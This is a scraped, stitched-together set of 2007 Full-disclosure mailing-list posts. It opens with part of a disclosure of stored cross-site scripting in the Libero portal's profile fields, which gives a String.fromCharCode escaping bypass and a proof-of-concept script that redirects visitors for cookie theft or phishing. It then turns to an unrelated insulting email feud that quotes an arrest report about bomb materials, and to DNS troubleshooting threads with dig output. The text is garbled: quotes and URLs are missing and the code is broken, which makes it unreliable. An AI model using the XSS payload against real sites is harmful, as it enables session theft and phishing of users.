 potential attack must be avoid by a deep check of the portal.

 The vulnerability once again can be found in the Community section
 of Libero portal, and the affected functionality is the profile
 creation and retrieval

 The implementation of this functionality allows the injection of
 malicious code in the profile, so that an attacker by visiting his/her
 profile can:

 1) steal username (in cookie)
 2) steal cookies
 3) arbitrary redirection for Phishing purpose

 The normal URL would be something linked like this:

 where Nick is the name of the nick whose profile has been
 manipulated or crafted to add arbitrary code.

 This vulnerability closely resemble to those in MySpace and other
 So it's nothing really complicated and you can skip on from here on ;)

 In admin pages (need to be logged by creating a fake account) on page

 there are two different fields named I miei difetti: (my defects)
 and i miei pregi: (my strong points) that accept arbitrary content.

 As stated by Rosario, the web application performs a simple
 parsing of the posted content, so that quote and double-quote (' and )
 chars are escaped by putting a \ before of them (both using ASCII and URL

 While I already had the Rosario's beautiful implementation of a simple
 evasion technique I preferred to encode the single char in an old
 snippet of mine.
 The aim of the snippet (I don't remember if I made it, stole it, stole
 only the main idea or where, sorry)  is to transform a string into a
 series of char numbers to be used with a String.fromCharCode command.
 Due to the limitation in size, the function which create the
 String.fromCharCode sequence is a detached and ascii value is
 decreased of 100 to limit the number of digits.
 This is the creation snippet:

  var toBenc = hettp://;
  var result = ;

   for (var k = 0; k  carlo.length; k++)
  result += (e( + (toBenc .charCodeAt(k) - 100) + )+);

  document.write(result + br)

  So URL; is rendered as:


 Using the two boxes we can use the following code for a POC:

  [BOX 1]
  function e(A) {
   return String.fromCharCode(A + 100)

  [BOX 2]
  var k =
  k +=
  window.location = k;

 The posting url can be easily modified to an http grabber such as:;

 or (much more dangerous) to a phishing site.

 Session Riding and derived problems have not been tested but many italian
 security experts are working on it.

 A POC url is available (until not deleted) here:

 Just my 2 cents and thanks to:

 Rosario Valotta for the first report, upon which this is based
 SharDick for help in JS ;)
 Vokda  Zen for consultancy and typo-killing ;)



 Permanent Url:

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Re: [Full-disclosure] RainbowCrack-Online Drama

2007-03-28 Thread Kradorex Xeron
Is this an advertizement, an insult, an invite, or what? :P

On Tuesday 27 March 2007 11:52, T Biehn wrote:
 It gets juicier:

 -- Forwarded Message: --
 From: John Harrison [EMAIL PROTECTED]
ECE0A040D030706?cmd=ComposeToadr=johnthedude%40msn%2Ecomsid=c0 To:
ECE0A040D030706?cmd=ComposeToadr=jimble11%40comcast%2Enetsid=c0 Subject:
 LIES From the Canadian Bomb Boy
 Date: Mon, 26 Mar 2007 21:16:02 +
  Well you missed the criminal charges and subsequent guilty verdict and
  the fact your parents had massive legal bills

 **I didn't think it was relevant.

  you really think that iRainbowcrack wants to be associated with a person
  so anti


  USA ..and a danger to school kids

 **you were more than happy to accommodate me when you needed things right?

  you have history of Bomb Charges , that is not wanted at

 **I bet.

  i wondered why the surname was missed out in that first article , Travis
  who didnt want to give his surname  WHATA DICK U ARE

 **Mommy and daddy told me not to give out my last name, you also didn't
 want it.

  Seventeen year old Travis Biehn was arrested last week and charged with
  making a terrorist threat against
  his Philadelphia area high school. It is alleged that the Grade 11
  student scrawled a threat on a washroom
  wall of Central Bucks East High School and then brought it to the
  attention of some teachers. Biehn's home
   was searched after other students told the authorities that the teen had
  told them that he knew how to
   make a bomb and was planning to use one. The search of his home revealed
  eight to ten pounds of
  potassium nitrate, fuses, detonators, and canisters as well as
  photographs of bomb-making material

 **See text of appeal / science to see that it wouldn't have made a bomb

  guess we start there
  and then a nice pic of u  i think

 **What a hottie, where's your pic?

   oh and an attachment of the threats to take the site down which u tried
  to make it so that we couldnt
  do a thing without you agreeing , not bad for such an idle fook , your a
  waste of space dude , i hear your druggie voice , hope you aint any at

 **You mean my requests that you adhere to the contract I got you to agree
 to? And upon breach my legitimate removal of copyrighted code?

  and then the best of all , the time you asked me for bots for your KR
  website scam that you couldnt keep quiet about

 **You make it seem like common place that people would just randomly
 ask you for
 such things. I wonder what kind of people you associate with? HACK 4 LYFE.

  damn i finding more logs all the time .i got shit loads on you and the
  great thing is , do uu think ppl will ever do any
  buisness with someone that cannot be trusted ,,i saw right through your
  phoney crap , u didnt like it , well thats my 5% on Travis Bomb Boy Biehn

 **Thats why I've got a decent resume at 18.

  You start a slannging match man , i welcome any chanllenge to the
  legallity of

 **Straight outta Compton...

  RainbowCrack-Online , the website i setup because you were in Jail ,

 **Bought the domain you mean?

  check out the reg date , check out the owners , And you think for 1
  minute that you got a rite to ask me to show you financial shit, you
  copied Daniel Hayes code

 **Actually I had Daniel start me off with some PHP code, he provided me
 with a subscription system he used before, I adopted and extended it for
 rainbowcrack-online. Which means I wrote the entire site, as the most
 recent codebase stands the only thing left of his code is in _ipn.php

  and added your gay name afetr his ,and by the way , google cache aint

 **I do have a gay name =[

  copyrighted even if u do copyrite the code that u didnt right
  To sum up you started this , and you aint got a damn clue what you are
  doing , you lie about MY company and you think that no retalliation will
  follow ,

 **You mean sending me incomprehensible e-mails?

  Dude i got shit on you that you would not dream off , and its all logged
  u see i log all msn and archive it ,,

 **Lets hope you don't get raided then. Right johny boy?

  and also MIRC from 5 yrs ago.. I WILL SEND YOU THE TEXT SO U CAN ATTACH

 **Fuck yes, it'll only get me more business.




 **You mean post this to full disclosure and be completely transparent about
 the whole thing? Also, storing my copyrighted code offsite because I didn't
 trust you enough is not 'sabotage' it's called not being stupid. 

Re: [Full-disclosure] I'm not the only one who can't resolve, but some can..

2007-03-25 Thread Kradorex Xeron
I get a valid answer as well:

Tracing to[a] via, maximum of 3 retries (
 |\___ [] ( Got authoritative 
 |\___ [] ( Got authoritative 
  \___ [] ( Got authoritative 
answer ( - ( - ( -

What'd I'd do is throw it in your hosts file temporarily until DNS behaves

On Sunday 25 March 2007 15:53, Tim wrote:
 Looks fine for me:


 ;  DiG 9.3.4
 ;; global options:  printcmd
 ;; Got answer:
 ;; -HEADER- opcode: QUERY, status: NOERROR, id: 26391
 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

 ;   IN  A


 ;; Query time: 4 msec
 ;; WHEN: Sun Mar 25 15:49:29 2007
 ;; MSG SIZE  rcvd: 47


 Do some of you happen to have a poisoned MS or Symantec DNS cache
 upstream of you?  (See [1] fmi.)



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Re: [Full-disclosure] Gone?

2007-03-25 Thread Kradorex Xeron
I get a valid answer:

;  DiG 9.3.2
;; global options:  printcmd
;; Got answer:
;; -HEADER- opcode: QUERY, status: NOERROR, id: 45905
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 3, ADDITIONAL: 0

; IN  A


;; AUTHORITY SECTION:  3536IN  NS  3536IN  NS  3536IN  NS

;; Query time: 42 msec
;; WHEN: Sun Mar 25 15:42:02 2007
;; MSG SIZE  rcvd: 115

What'd I'd do is throw it in your hosts file temporarily until DNS behaves

On Sunday 25 March 2007 15:31, Anshuman G wrote:

 Same for me.

 [EMAIL PROTECTED]:~ dig | grep A
 ;; -HEADER- opcode: QUERY, status: NOERROR, id: 32352
 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
 ; IN  A

 On 3/26/07, Tremaine Lea [EMAIL PROTECTED] wrote:
  On 25-Mar-07, at 12:35 PM, Larry Seltzer wrote: resolves to, has someone taken it offline?
   No, I'm still getting to the site. I don't suppose, and a lot of other security domains also resolve to for you, do they?
   Larry Seltzer
  It's just for me, the others resolve fine.  My checks
  were run from linux boxes ;)  localhost address checking from Shaw in
  Calgary, normal result checking from an Interland server in the US.
  Tremaine Lea
  Network Security Consultant
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Re: [Full-disclosure] Gone?

2007-03-25 Thread Kradorex Xeron
I get a valid answer:  3   IN  A

What'd I'd do is throw it in your hosts file temporarily until DNS behaves

On Sunday 25 March 2007 15:31, Anshuman G wrote:

 Same for me.

 [EMAIL PROTECTED]:~ dig | grep A
 ;; -HEADER- opcode: QUERY, status: NOERROR, id: 32352
 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
 ; IN  A

 On 3/26/07, Tremaine Lea [EMAIL PROTECTED] wrote:
  On 25-Mar-07, at 12:35 PM, Larry Seltzer wrote: resolves to, has someone taken it offline?
   No, I'm still getting to the site. I don't suppose, and a lot of other security domains also resolve to for you, do they?
   Larry Seltzer
  It's just for me, the others resolve fine.  My checks
  were run from linux boxes ;)  localhost address checking from Shaw in
  Calgary, normal result checking from an Interland server in the US.
  Tremaine Lea
  Network Security Consultant
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